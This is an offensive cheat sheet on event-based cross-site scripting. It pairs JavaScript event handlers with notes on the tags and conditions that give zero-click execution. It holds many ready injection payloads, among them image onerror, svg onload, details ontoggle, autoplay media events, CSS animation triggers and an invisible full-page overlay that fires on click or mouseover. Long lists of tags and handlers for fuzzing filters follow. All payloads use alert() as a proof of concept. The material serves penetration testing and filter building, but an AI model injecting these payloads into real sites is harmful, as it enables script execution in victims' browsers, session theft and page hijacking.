💫Event Based XSS

In JavaScript, several events can be used to trigger Cross-Site Scripting (XSS) payloads

- onabort: This event is triggered when an image fails to load.
- onerror: This event is triggered when an error occurs or an image fails to load.
- onload: This event is triggered when an object has loaded.
- onchange: This event is triggered when the content of a form element, the selection, or the checked state has changed (for <input>, <select>, <textarea>).
- onsubmit: This event is triggered when a form is submitted.
- onreset: This event is triggered when a form is reset.
- onselect: This event is triggered after some text has been selected in an element.
- onblur: This event is triggered when an element loses focus.
- onfocus: This event is triggered when an element receives focus.Pyload= "onfocus=alert(1337) autofocus="
- onkeydown: This event is triggered when a key is pressed.
- onkeypress: This event is triggered when a key is pressed and released.
- onkeyup: This event is triggered when a key is released.
- onclick: This event is triggered when an element is clicked.
- ondblclick: This event is triggered when an element is double-clicked.
- onmousedown: This event is triggered when a mouse button is pressed.
- onmousemove: This event is triggered when the mouse is moved.
- onmouseout: This event is triggered when the mouse is moved off an element.
- onmouseover: This event is triggered when the mouse is moved over an element.
- onmouseup: This event is triggered when a mouse button is released.

---------------------------------------------------------------

Standard HTML events

Tag Attribute	Tags supported	Note
onload	body, iframe, img, frameset, input, script, style, link, svg	Great for 0-click, but super commonly filtered
onpageshow	body	Great for 0-click, but appears only usable in Non-DOM injections
onfocus	input, select, a	for 0-click: use together with autofocus=""
onerror	img, input, object, link, script, video, audio	make sure to pass params to make it fail
onanimationstart	Combine with any element that can be animated	Fired then a CSS animation starts
onanimationend	Combine with any element that can be animated	Fires when a CSS animation ends
onstart	marquee	Fires on marquee animation start - Firefox only?
onfinish	marquee	Fires on marquee animation end - Firefox only?
ontoggle	details	Must have the ‘open’ attribute for 0-click

Situational HTML events

Tag Attribute	Tags supported	Note
onmessage	most tags	postMessage is commonly used to get around iframe restrictions and share data, as a result if your page is doing this you can use onmessage to intercept messages and trigger code
onblur	input, select, a	Set autofocus="" for an easy 1-click when the user switches focus away from the injected element by clicking on anything on the page

Examples:

<body onload=alert()>
<img src=x onerror=alert()>
<svg onload=alert()>
<body onpageshow=alert(1)>
<marquee width=10 loop=2 behavior="alternate" onbounce=alert()> (firefox only)
<marquee onstart=alert(1)> (firefox only)
<marquee loop=1 width=0 onfinish=alert(1)> (firefox only)
<input autofocus="" onfocus=alert(1)></input>
<details open ontoggle="alert()">

---------------------------------------------------------------

HTML5 events

Name	Tags	Note
onplay	video, audio	For 0-click: combine with autoplay HTML attribute and combine with valid video/audio clip
onplaying	video, audio	For 0-click: combine with autoplay HTML attribute and combine with valid video/audio clip
oncanplay	video, audio	Must link to a valid video/audio clip
onloadeddata	video, audio	Must link to a valid video/audio clip
onloadedmetadata	video, audio	Must link to a valid video/audio clip
onprogress	video, audio	Must link to a valid video/audio clip
onloadstart	video, audio	Great underexploited 0-click vector
oncanplay	video, audio	Must link to a valid video/audio clip

Examples:

<video autoplay onloadstart="alert()" src=x></video>
<video autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls onloadeddata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls onloadedmetadata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls onloadstart="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls onloadstart="alert()"><source src=x></video>
<video controls oncanplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<audio autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<audio autoplay controls onplaying="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>

---------------------------------------------------------------

CSS-based Injection

True XSS injection through CSS is dead (for now). The following are XSS vectors that depend on CSS stylesheets or are otherwise enhanced by them.

Name	Tags	Note
onmouseover	most tags	Will trigger when mouse moves over the injected element. If possible, add styling to make it as big as possible. It’s technically a 0-click if you don’t have to click, right? /s
onclick	most tags	Will trigger when user clicks on element. If possible, add styling to make it as big as possible.
onanimationstart & onanimationend	most tags	Triggers on start or end of a CSS animation, which you can make happen on page load (0-click).

Note: Below uses style tags to set up keyframes for animation(start|end), but you can also check for already included CSS to reuse what’s already there by using e.g. animation: alreadydefined;. It doesn’t matter what the animation is, just that it exists.

<style>@keyframes x {}</style>
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

Payload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:

<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>

Same, but for moving your mouse anywhere over the page (0-click-ish):

<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>

---------------------------------------------------------------

HTML Tags

<a>
<abbr>
<acronym>
<address>
<applet>
<area>
<article>
<aside>
<audio>
<b>
<base>
<basefont>
<bdi>
<bdo>
<bgsound>
<big>
<blink>
<blockquote>
<body>
<br>
<button>
<canvas>
<caption>
<center>
<cite>
<code>
<col>
<colgroup>
<content>
<data>
<datalist>
<dd>
<del>
<details>
<dfn>
<dialog>
<dir>
<div>
<dl>
<dt>
<em>
<embed>
<fieldset>
<figcaption>
<figure>
<font>
<footer>
<form>
<frame>
<frameset>
<h1>
<h2>
<h3>
<h4>
<h5>
<h6>
<head>
<header>
<hgroup>
<hr>
<html>
<i>
<iframe>
<img>
<input>
<ins>
<isindex>
<kbd>
<keygen>
<label>
<legend>
<li>
<link>
<listing>
<main>
<map>
<mark>
<marquee>
<menu>
<menuitem>
<meta>
<meter>
<nav>
<nobr>
<noframes>
<noscript>
<object>
<ol>
<optgroup>
<option>
<output>
<p>
<param>
<picture>
<plaintext>
<pre>
<progress>
<q>
<rp>
<rt>
<rtc>
<ruby>
<s>
<samp>
<script>
<section>
<select>
<shadow>
<slot>
<small>
<source>
<spacer>
<span>
<strike>
<strong>
<style>
<sub>
<summary>
<sup>
<table>
<tbody>
<td>
<template>
<textarea>
<tfoot>
<th>
<thead>
<time>
<title>
<tr>
<track>
<tt>
<u>
<ul>
<var>
<video>
<wbr>
<xmp>

Event handlers

onafterprint
onafterscriptexecute
onanimationcancel
onanimationend
onanimationiteration
onanimationstart
onauxclick
onbeforecopy
onbeforecut
onbeforeinput
onbeforeprint
onbeforescriptexecute
onbeforetoggle
onbeforeunload
onbegin
onblur
onbounce
oncanplay
oncanplaythrough
onchange
onclick
onclose
oncontextmenu
oncopy
oncuechange
oncut
ondblclick
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
ondurationchange
onend
onended
onerror
onfinish
onfocus
onfocusin
onfocusout
onfullscreenchange
onhashchange
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onload
onloadeddata
onloadedmetadata
onmessage
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onmousewheel
onmozfullscreenchange
onpagehide
onpageshow
onpaste
onpause
onplay
onplaying
onpointerdown
onpointerenter
onpointerleave
onpointermove
onpointerout
onpointerover
onpointerrawupdate
onpointerup
onpopstate
onprogress
onratechange
onrepeat
onreset
onresize
onscroll
onscrollend
onsearch
onseeked
onseeking
onselect
onselectionchange
onselectstart
onshow
onstart
onsubmit
ontimeupdate
ontoggle
ontoggle(popover)
ontouchend
ontouchmove
ontouchstart
ontransitioncancel
ontransitionend
ontransitionrun
ontransitionstart
onunhandledrejection
onunload
onvolumechange
onwebkitanimationend
onwebkitanimationiteration
onwebkitanimationstart
onwebkittransitionend
onwheel